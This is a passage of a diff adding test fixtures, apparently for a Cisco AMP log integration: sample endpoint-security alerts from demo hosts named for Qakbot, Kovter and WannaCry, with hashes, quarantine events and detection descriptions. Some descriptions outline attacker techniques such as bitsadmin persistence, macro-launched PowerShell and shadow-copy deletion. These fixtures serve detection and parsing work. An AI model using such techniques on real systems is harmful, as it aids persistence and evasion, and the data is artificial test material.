+                "ingested": "2021-09-12T17:32:23.854072129Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066228000300,\"timestamp\":1610621237,\"timestamp_nanoseconds\":228000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}",
+                "kind": "alert",
+                "start": "2021-01-14T10:47:17.000Z",
+                "action": "Cloud IOC",
+                "id": "1476905066228000300",
+                "category": [
+                    "file"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "b6:9c:d0:89:b8:66",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Clean",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "b6:9c:d0:89:b8:66"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "cloud_ioc": {
+                        "short_description": "W32.WinWord.Powershell",
+                        "description": "Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables."
+                    },
+                    "event_type_id": 1107296274
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T10:33:46.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:23.854074002Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Quarantine Attempt Failed",
+                "id": "6411425813945647000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6411425813945647106",
+                    "event_type_id": 2164260893
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T10:33:46.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:23.854075908Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Quarantine",
+                "id": "6411425813945647000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "detection_id": "6411425813945647105",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648155
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T10:33:46.000Z",
+            "file": {
+                "name": "AySxs.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe",
+                "hash": {
+                    "sha256": "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:23.854077773Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6411425813945647000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.12081E6CA3-95.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6411425813945647106",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        }
+    ]
+}
\ No newline at end of file
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log
new file mode 100644
index 00000000000..211de5d2bc9
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log
@@ -0,0 +1,49 @@
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837","sha1":"128aa78059540cf0cdae2a3cea30cd80e00f2046","md5":"c877b67a5733c59d0d8ed8d519df0c91"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533243623469744000,"timestamp":1610619329,"timestamp_nanoseconds":596000000,"date":"2021-01-14T10:15:29+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT657.tmp","file_path":"\\\\?\\C:\\BIT657.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"SqGGuYXyy.exe","file_path":"\\\\?\\C:\\SqGGuYXyy.exe","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT4BBF.tmp","file_path":"\\\\?\\C:\\BIT4BBF.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739875754000,"timestamp":1610618750,"timestamp_nanoseconds":875739000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.","short_description":"W32.WScriptExecuteFakeExtension.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739868158500,"timestamp":1610618750,"timestamp_nanoseconds":868146000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.","short_description":"W32.Bitsadmin.ioc"},"file":{"disposition":"Clean","file_name":"bitsadmin.exe","file_path":"/C:/Windows/System32/bitsadmin.exe","identity":{"sha256":"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00"},"parent":{"disposition":"Clean","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739846959000,"timestamp":1610618750,"timestamp_nanoseconds":846943000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.","short_description":"W32.WScriptLaunchedZippedJS.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576726048000300,"timestamp":1610618696,"timestamp_nanoseconds":48000000,"date":"2021-01-14T10:04:56+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618696,"start_date":"2021-01-14T10:04:56+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious 